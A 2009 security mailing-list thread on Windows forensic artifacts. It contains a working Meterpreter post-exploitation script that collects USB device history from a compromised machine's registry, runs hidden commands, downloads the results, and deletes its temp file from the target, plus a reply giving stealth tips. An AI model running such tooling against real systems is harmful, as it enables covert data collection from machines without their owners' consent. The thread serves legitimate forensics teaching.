PaulDotCom mailing list archives
Forensically interesting spots in the Windows 7, Vista and XP file system and registry (prep work for my anti-forensics class)
From: carlos_perez at darkoperator.com (Carlos Perez)
Date: Fri, 14 Aug 2009 19:58:37 -0400
save the data in the .msf3 log instead of writing it on the target, this will make your script smaller and more stealthy. here is the function I use for this on my scripts: *#Function for writing data to a file* *def filewrt(file2wrt, data2wrt)* * output = ::File.open(file2wrt, "a")* * data2wrt.each_line do |d|* * output.puts(d)* * end* * output.close* *end* just give it the log file and the data like this *log = **"#{logs}\\installedusb.txt"* *filewrt(log, message)* to create the message string variable do it like this: * message << " ==============================** ==============================**==============================** ==============================**\n" * * message << "\tFriendly Name : #{friendlyName.data}\n"* * message << "\t\t - Class : #{cl.data}\n" * * message << "\t\t- DeviceDesc : #{deviceDesc.data}\n"* * message << "\t\t - HardwareID : #{hardwareID.data}\n"* Iterate thru each key, get the values and close the key before going to the next. I hope this helps On Fri, Aug 14, 2009 at 4:47 PM, Dimitrios Kapsalis <dimitrios at gmail.com>wrote:
Here is a meterpreter script to pull the USB devices from the registry. Few issues in saving the output to a text file on the target before downloading it. think its the \n that i'm adding. If anyone has any tips I'm all ears. As well the output on the meterpreter screen will be run installedusb [*] New session on 192.168.0.50:43304... [*] -- Files saved to C:\Documents and Settings\user\Application Data/.msf3/logs/installedsoftware/192.168.0.50_20090814.373838964... [*] -- Data logged to C:\DOCUME~1\user\LOCALS~1\Temp\25.dat.... [*] Dumping software installed on pc per registry HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR... [*] ======================================================================================================================== * Friendly Name : Apple iPod USB Device - Class : DiskDrive - DeviceDesc : Disk drive - HardwareID : USBSTOR\DiskApple___iPod____________1.62?USBSTOR\DiskApple___iPod____________?USBSTOR\DiskApple___?USBSTOR\Apple___iPod____________1?Apple___iPod____________1?USBSTOR\GenDisk?GenDisk?? [*] -- Downloading C:\DOCUME~1\user\LOCALS~1\Temp\25.dat.... [*] -- C:\Documents and Settings\user\Application Data/.msf3/logs/installedsoftware/192.168.0.50_20090814.373838964\installedusb.txt downloaded! [*] ...Done!! [*] Completed processing on 192.168.0.50:43304... [code] # # This is a Meterpreter script designed to be used by the Metasploit Framework # # Meterpreter script for pulling forensics data from registry for any USB device # connected to system # # Provided by Dimitrios Kapsalis # Verion: 0.1 require 'fileutils' # ==================================================================================================================================== # Print message to file on target # ==================================================================================================================================== def m_writetofile(session,file,message) cmd = "cmd /c echo #{message} >> #{file}" m_exec(session, cmd) end # ==================================================================================================================================== # Delete a file (meterpreter has no unlink API yet) # ==================================================================================================================================== def m_unlink(session, path) r = session.sys.process.execute("cmd.exe /c del /F /S /Q " + path, nil, {'Hidden' => 'true'}) while(r.name) select(nil, nil, nil, 0.10) end r.close end # ==================================================================================================================================== # Exec a command and return the results # ==================================================================================================================================== def m_exec(session, cmd) begin r = session.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true}) b = "" while(d = r.channel.read) b << d end r.channel.close r.close b rescue ::Exception => e print_status("Error Running Command #{cmd}: #{e.class} #{e}") end end # ==================================================================================================================================== # Function to upload files # ==================================================================================================================================== def m_upload(session,file) location = session.fs.file.expand_path("%temp%") fileontrgt = "#{location}\\#{rand(100)}.exe" print_status("\t-- Uploading #{file}....") session.fs.file.upload_file("#{fileontrgt}","#{file}") print_status("\t-- #{file} uploaded!") print_status("\t-- File on target #{fileontrgt}") return fileontrgt end # ==================================================================================================================================== # Function to download files # ==================================================================================================================================== def m_download(session,src,dst) location = session.fs.file.expand_path("%temp%") print_status("\t-- Downloading #{src}....") session.fs.file.download_file("#{dst}","#{src}") print_status("\t-- #{dst} downloaded!") end # ==================================================================================================================================== # Script proper # ==================================================================================================================================== # The 'client' object holds the Meterpreter session # Aliasing here for plugin compatibility session = client script_name = "installedsoftware" # Extract the host and port host,port = session.tunnel_peer.split(':') print_status("New session on #{host}:#{port}...") # Create a directory for the logs logs = ::File.join(Msf::Config.config_directory, 'logs',script_name , host + "_" + Time.now.strftime("%Y%m%d.%M%S")+sprintf("%.5d",rand(100000)) ) # Create the log directory ::FileUtils.mkdir_p(logs) print_status("-- Files saved to #{logs}...") location = session.fs.file.expand_path("%temp%") filename = "#{rand(100)}.dat" fileontrgt = "#{location}\\#{filename}" print_status("-- Data logged to #{fileontrgt}....") begin #=============================================================================================================================== #=============================================================================================================================== #=============================================================================================================================== # Pull USB history Pull USB history Pull USB history Pull USB history Pull USB history Pull USB history Pull USB history #=============================================================================================================================== #=============================================================================================================================== #=============================================================================================================================== #=========================================================================================== # Dump USB device history #=========================================================================================== key = "HKLM\\SYSTEM\\CurrentControlSet\\Enum\\USBSTOR" root_key, base_key = session.sys.registry.splitkey(key) message = "---------------------------------------------------------------------" m_writetofile(session,fileontrgt,message) message = "Dumping software installed on pc per registry #{key}... " print_status(message) m_writetofile(session,fileontrgt,message) message = "---------------------------------------------------------------------" m_writetofile(session,fileontrgt,message) session.sys.registry.create_key(root_key, base_key).each_key() do |device| puts device # ========================================= # ... # ========================================= session.sys.registry.create_key(root_key, "#{base_key}\\#{device}").each_key() do |intermediate| puts intermediate rk = session.sys.registry.open_key(root_key, "#{base_key}\\#{device}\\#{intermediate}", KEY_READ) cl = rk.query_value("class") deviceDesc = rk.query_value("DeviceDesc") friendlyName = rk.query_value("FriendlyName") hardwareID = rk.query_value("HardwareID") message = " ========================================================================================================================\n" << " * Friendly Name : #{friendlyName.data}\n" << " - Class : #{cl.data}\n" << " - DeviceDesc : #{deviceDesc.data}\n" << " - HardwareID : #{hardwareID.data}\n" print_status(message) m_writetofile(session,fileontrgt,message) end end #=========================================================================================== # download output file #=========================================================================================== m_download(session, fileontrgt, "#{logs}\\installedusb.txt") sleep(3) #=========================================================================================== # delete exe from target system #=========================================================================================== m_unlink(session, fileontrgt) print_status("...Done!!") rescue ::Exception => e print_status("Exception: #{e.class} #{e} #{e.backtrace}") end print_status("Completed processing on #{host}:#{port}...") [/code] On Fri, Aug 14, 2009 at 12:57 PM, Dave Hull <dphull at trustedsignal.com>wrote:The user assist keys are ROT13 encoded! There's just so much good stuff. Volume shadow copies and restore points too. And the list goes on... _______________________________________________ Pauldotcom mailing list Pauldotcom at mail.pauldotcom.com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com_______________________________________________ Pauldotcom mailing list Pauldotcom at mail.pauldotcom.com http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom Main Web Site: http://pauldotcom.com
-------------- next part -------------- An HTML attachment was scrubbed... URL: http://mail.pauldotcom.com/pipermail/pauldotcom/attachments/20090814/41cdf9ea/attachment.htm
Current thread:
- Forensically interesting spots in the Windows 7, Vista and XP file system and registry (prep work for my anti-forensics class) Adrian Crenshaw (Aug 13)
- Forensically interesting spots in the Windows 7, Vista and XP file system and registry (prep work for my anti-forensics class) iamnowonmai (Aug 13)
- Forensically interesting spots in the Windows 7, Vista and XP file system and registry (prep work for my anti-forensics class) Dave Hull (Aug 14)
- Forensically interesting spots in the Windows 7, Vista and XP file system and registry (prep work for my anti-forensics class) Dimitrios Kapsalis (Aug 14)
- Forensically interesting spots in the Windows 7, Vista and XP file system and registry (prep work for my anti-forensics class) Carlos Perez (Aug 14)
- Forensically interesting spots in the Windows 7, Vista and XP file system and registry (prep work for my anti-forensics class) Carlos Perez (Aug 14)
- Forensically interesting spots in the Windows 7, Vista and XP file system and registry (prep work for my anti-forensics class) Dimitrios Kapsalis (Aug 14)
- Forensically interesting spots in the Windows 7, Vista and XP file system and registry (prep work for my anti-forensics class) Dimitrios Kapsalis (Aug 14)